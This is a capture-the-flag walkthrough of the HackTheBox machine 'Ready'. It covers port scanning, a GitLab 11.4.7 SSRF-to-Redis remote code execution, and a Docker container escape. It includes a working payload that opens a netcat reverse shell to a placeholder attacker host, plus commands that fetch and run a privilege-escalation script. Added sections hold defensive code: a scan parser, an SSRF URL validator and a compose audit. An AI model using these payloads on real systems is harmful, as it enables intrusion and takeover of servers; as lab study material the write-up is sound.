Introduction

Name Ready
Release date 12 Dec 2020
IP 10.10.10.220
OS Linux
Creator bertolis
Points 30
Difficulty Medium
Retired date 15 May 2021

Ready from HackTheBox is a medium machine. It starts with two open ports: SSH on 22 and HTTP on 5080, which hosts a GitLab instance. After creating an account we find that the GitLab version is vulnerable to RCE, and from there we get a shell on the box. Some enumeration shows that we are inside a Docker container, and we escape the container's restrictions to reach the real system. For me the Docker part was the interesting one, since container technology is growing rapidly and learning about it is vital in a real pentest.

Summary

Recon

Nmap

A full TCP Nmap scan shows two open ports, 22 and 5080.

sudo nmap -p- --min-rate 2500 -oN my_data/ready/recon/full-tcp 10.129.144.245
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-13 20:44 UTC
Nmap scan report for 10.129.144.245
Host is up (0.017s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
5080/tcp open  onscreen

Nmap done: 1 IP address (1 host up) scanned in 13.75 seconds

A targeted Nmap scan with default scripts and version enumeration against ports 22 and 5080. From the OpenSSH version we can guess this is Ubuntu 20.04 LTS (Focal Fossa).

sudo nmap -p22,5080 -sC -sV -oN my_data/ready/recon/targeted 10.129.144.245
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-13 20:47 UTC
Nmap scan report for 10.129.144.245
Host is up (0.012s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
5080/tcp open  http    nginx
| http-robots.txt: 53 disallowed entries (15 shown)
| / /autocomplete/users /search /api /admin /profile 
| /dashboard /projects/new /groups/new /groups/*/edit /users /help 
|_/s/ /snippets/new /snippets/*/edit
| http-title: Sign in \xC2\xB7 GitLab
|_Requested resource was http://10.129.144.245:5080/users/sign_in
|_http-trane-info: Problem with XML parsing of /evox/about
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.20 seconds
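The two scans above are read by eye in the write-up. As an added example (not part of the original post), here is a small parser for Nmap's normal (-oN) output that turns a scan like the one above into structured data: host, per-port state/service/version, and the first line of each NSE script result. The sample input is the targeted scan output copied from above; the regexes and field names are my own.

```python
import re

# Added example, not from the original write-up: a parser for Nmap "normal"
# (-oN) output. Sample input is the targeted scan shown in the write-up.
SAMPLE_SCAN = r"""Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-13 20:47 UTC
Nmap scan report for 10.129.144.245
Host is up (0.012s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
5080/tcp open  http    nginx
| http-robots.txt: 53 disallowed entries (15 shown)
| / /autocomplete/users /search /api /admin /profile 
| /dashboard /projects/new /groups/new /groups/*/edit /users /help 
|_/s/ /snippets/new /snippets/*/edit
| http-title: Sign in \xC2\xB7 GitLab
|_Requested resource was http://10.129.144.245:5080/users/sign_in
|_http-trane-info: Problem with XML parsing of /evox/about
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
"""

HOST_LINE = re.compile(r"^Nmap scan report for (\S+)")
# "22/tcp   open  ssh     OpenSSH 8.2p1 ..." ; the version column is optional (-sV only)
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")
# First line of an NSE script result: "| name: value" or "|_name: value"
SCRIPT_LINE = re.compile(r"^\|_?\s*([\w-]+): ?(.*)$")


def parse_nmap_normal(text: str) -> dict:
    """Return {"host": str|None, "ports": [{"port","proto","state","service","version","scripts"}, ...]}."""
    result = {"host": None, "ports": []}
    current = None  # the port entry that subsequent script lines belong to
    for line in text.splitlines():
        m = HOST_LINE.match(line)
        if m:
            result["host"] = m.group(1)
            continue
        m = PORT_LINE.match(line)
        if m:
            current = {
                "port": int(m.group(1)),
                "proto": m.group(2),
                "state": m.group(3),
                "service": m.group(4),
                "version": (m.group(5) or "").strip(),
                "scripts": {},
            }
            result["ports"].append(current)
            continue
        m = SCRIPT_LINE.match(line)
        if m and current is not None:
            # Only the first line of each script is kept; continuation lines
            # (host keys, robots.txt entries) are deliberately skipped.
            current["scripts"][m.group(1)] = m.group(2).strip()
    return result


def open_ports(result: dict) -> list[int]:
    """Port numbers reported as open, in scan order."""
    return [p["port"] for p in result["ports"] if p["state"] == "open"]


if __name__ == "__main__":
    scan = parse_nmap_normal(SAMPLE_SCAN)
    print(scan["host"], open_ports(scan))
    for p in scan["ports"]:
        print(p["port"], p["service"], p["version"], p["scripts"].get("http-title", ""))
```

Feeding the full-TCP scan (no -sV) through the same function works too: the version field simply comes back empty, which is why it is optional in the port regex.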

HTTP port 5080

By visiting HTTP port 5080 we see the default page of a GitLab instance with two options, Register or Sign in.

[Screenshot: HTTP port 5080]

We register a user account for further enumeration.

[Screenshot: Register to gitlab instance]

And we are logged in (it did not need e-mail confirmation, so we used a fake one).

[Screenshot: Logging in]

Once logged in we continue enumerating and find a help page that shows GitLab version 11.4.7 along with a message to update asap.

[Screenshot: Finding gitlab version]

Knowing the GitLab version, it is time to check whether any public exploit exists for it. There is an RCE, and we found an interesting article and video by LiveOverflow that explain it; check them out to understand the RCE better.

[Screenshot: Searching for exploits]

Initial shell

Okay, it is time to try the RCE.

Step 1

Start by creating a new project.

[Screenshot: Creating new project]

Click on Import project.

[Screenshot: Importing project]

Then choose Repo by URL to import a git repository by URL.

[Screenshot: Importing repo by URL]

Step 2

Now we use the payload from the article and video mentioned above (we chose to URL-encode it, but it can also be used without encoding from Burp Suite). Here is the payload used:

git://[0:0:0:0:0:ffff:127.0.0.1]:6379/
 multi
 sadd resque:gitlab:queues system_hook_push
 lpush resque:gitlab:queue:system_hook_push "{\"class\":\"GitlabShellWorker\",\"args\":[\"class_eval\",\"open(\'|cat /flag | nc attacker_ip 4200 -e /bin/bash \').read\"],\"retry\":3,\"queue\":\"system_hook_push\",\"jid\":\"ad52abc5641173e217eb2e52\",\"created_at\":1513714403.8122594,\"enqueued_at\":1513714403.8129568}"
 exec
 exec
/ssrf.git

[Screenshot: Using payload for reverse shell]

I was lazy, so I used an online URL encoder.

[Screenshot: URL encoding]

nc -nvlp 4200 # attacking machine, listener for the callback

We get a callback from our payload.

[Screenshot: Reverse shell]
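From the defender's side, the payload above works only because the import URL is accepted with embedded newlines (which become extra Redis commands) and with a host that points back at the instance itself, hidden as an IPv4-mapped IPv6 address. The following is an added example, not code from the original post or from GitLab: an allow-list check for "import repository by URL" input that rejects both. The function name, the allowed-scheme set and the sample inputs are my own; the sample URLs only reproduce the shape of the payload (newlines, loopback in mapped form) and a normal public repository URL.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Added example, not from the original write-up or from GitLab: validate a
# user-supplied repository import URL before any network access happens.

ALLOWED_SCHEMES = {"http", "https", "git"}
# Any ASCII control character (NUL, TAB, CR, LF, ...) is invalid in a URL.
CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")


def validate_import_url(url: str) -> tuple[bool, str]:
    """Return (accepted, reason).

    The raw string is checked BEFORE parsing: urllib.parse strips tab/CR/LF
    from a URL, so a parse-then-check order would never see the injection.
    """
    if CONTROL_CHARS.search(url):
        return False, "control characters in URL"
    try:
        parts = urlsplit(url)
        host = parts.hostname  # brackets stripped, lower-cased
        parts.port             # raises ValueError on a malformed port
    except ValueError as exc:
        return False, f"unparseable URL: {exc}"
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    if not host:
        return False, "missing host"
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        # A DNS name cannot be judged offline. Resolve it and re-run the
        # address check on the resolved IP right before connecting (DNS
        # rebinding); that part is outside this snippet.
        return True, "hostname accepted; re-check the resolved address at connect time"
    # Unwrap IPv4-mapped IPv6 (::ffff:127.0.0.1) so 127.0.0.1 is seen for what it is.
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    if (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_unspecified or ip.is_reserved or ip.is_multicast):
        return False, f"internal address {ip} not allowed"
    return True, "ok"


if __name__ == "__main__":
    # Constructed inputs: the shape of the write-up's payload (newlines, loopback
    # in IPv4-mapped form) and a normal public repository URL.
    for u in (
        "git://[0:0:0:0:0:ffff:127.0.0.1]:6379/\n multi\n exec\n/ssrf.git",
        "git://[0:0:0:0:0:ffff:127.0.0.1]:6379/ssrf.git",
        "https://github.com/example/repo.git",
    ):
        print(repr(u[:40]), "->", validate_import_url(u))
```

The order of the checks matters: the control-character test runs on the raw string, because Python's urlsplit quietly discards tab, CR and LF, and the address test runs after unwrapping the IPv4-mapped form, because ::ffff:127.0.0.1 is not itself reported as loopback by every version of the ipaddress module.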

Root shell

After getting an initial shell, the journey continues towards root access. Enumeration leads us to a directory called backup in /opt, with some interesting files inside, such as docker-compose.yml, which makes us think we are inside a Docker container.

[Screenshot: /opt]

Checking the content of gitlab.rb we find an smtp_password; trying su with it works, and voila, we are root in the Docker container.

[Screenshot: gitlab.rb]

Searching for how to escape a Docker container to the real system, we found this article, which helped to get root (the PoC was modified to insert an SSH public key into authorized_keys). A Python HTTP server on the attacking machine serves the shell script to the victim machine.
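Container escapes of the kind used here depend on the container having been started with more privilege than it needs, and the docker-compose.yml found in /opt/backup is exactly where such settings would be declared. As an added example (not part of the original write-up, and not the box's real compose file, which the post does not show), here is a small audit function that flags the compose settings that typically make an escape possible: privileged mode, dangerous added capabilities, host PID/network namespaces, disabled seccomp/AppArmor, and bind mounts of the Docker socket or raw kernel paths. The sample is constructed and its flagged values are assumptions; it takes the dictionary that yaml.safe_load would return, so PyYAML is not needed to run it.

```python
# Added example, not from the original write-up: audit a docker-compose
# service definition for escape-enabling settings. SAMPLE_COMPOSE is a
# CONSTRUCTED dict (what yaml.safe_load would return); the box's real
# docker-compose.yml is not shown in the write-up and the flagged values
# are assumptions.
SAMPLE_COMPOSE = {
    "version": "3",
    "services": {
        "web": {
            "image": "gitlab/gitlab-ee:11.4.7-ee.0",  # version number from the write-up
            "privileged": True,                        # assumed
            "volumes": [
                "/srv/gitlab/config:/etc/gitlab",
                "/var/run/docker.sock:/var/run/docker.sock",  # assumed
            ],
        },
        "redis": {"image": "redis:5", "cap_add": ["NET_ADMIN"]},
    },
}

# Capabilities that, for a root process inside the container, reach the host
# (mount/cgroup tricks, ptrace of host processes, loading kernel modules, ...).
DANGEROUS_CAPS = {"SYS_ADMIN", "SYS_PTRACE", "SYS_MODULE", "DAC_READ_SEARCH", "ALL"}
# Host paths whose bind mount hands over the host: the Docker socket,
# raw kernel interfaces, or block devices.
SENSITIVE_HOST_PATHS = ("/var/run/docker.sock", "/proc", "/sys", "/dev")


def _volume_source(vol) -> str:
    """Host side of a compose volume, in short ("host:ctr[:opts]") or long (dict) syntax."""
    if isinstance(vol, dict):
        return str(vol.get("source", ""))
    return str(vol).split(":", 1)[0]


def _is_sensitive_path(src: str) -> bool:
    if src == "/":
        return True
    return any(src == p or src.startswith(p + "/") for p in SENSITIVE_HOST_PATHS)


def audit_compose(compose: dict) -> dict[str, list[str]]:
    """Return {service_name: [finding, ...]} for services with escape-enabling settings."""
    findings: dict[str, list[str]] = {}
    for name, svc in (compose.get("services") or {}).items():
        issues = []
        if svc.get("privileged"):
            issues.append("privileged: true (all capabilities and host devices)")
        caps = {str(c).upper().removeprefix("CAP_") for c in svc.get("cap_add") or []}
        for cap in sorted(caps & DANGEROUS_CAPS):
            issues.append(f"cap_add {cap}")
        if svc.get("pid") == "host":
            issues.append("pid: host (host processes visible)")
        if svc.get("network_mode") == "host":
            issues.append("network_mode: host (shares the host network namespace)")
        for opt in svc.get("security_opt") or []:
            if str(opt).replace("=", ":").endswith(":unconfined"):
                issues.append(f"security_opt {opt} (seccomp/AppArmor disabled)")
        for vol in svc.get("volumes") or []:
            src = _volume_source(vol)
            if _is_sensitive_path(src):
                issues.append(f"bind mount of host path {src}")
        if issues:
            findings[name] = issues
    return findings


if __name__ == "__main__":
    for service, issues in audit_compose(SAMPLE_COMPOSE).items():
        print(service)
        for issue in issues:
            print("  -", issue)
```

Named volumes (data:/data) are not paths and are left alone; the ordinary /srv/gitlab/config mount is also not flagged, only the socket, kernel and device paths and the root filesystem are.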

python3 -m http.server # attacking machine, serves priv.sh on port 8000
wget http://attacker_ip:8000/priv.sh # victim machine
chmod +x priv.sh
./priv.sh

[Screenshot: priv.sh]

Now we can SSH to the Ready machine as root.

ssh -i .ssh/id_rsa.pub root@10.129.144.245
[Screenshot: Ready]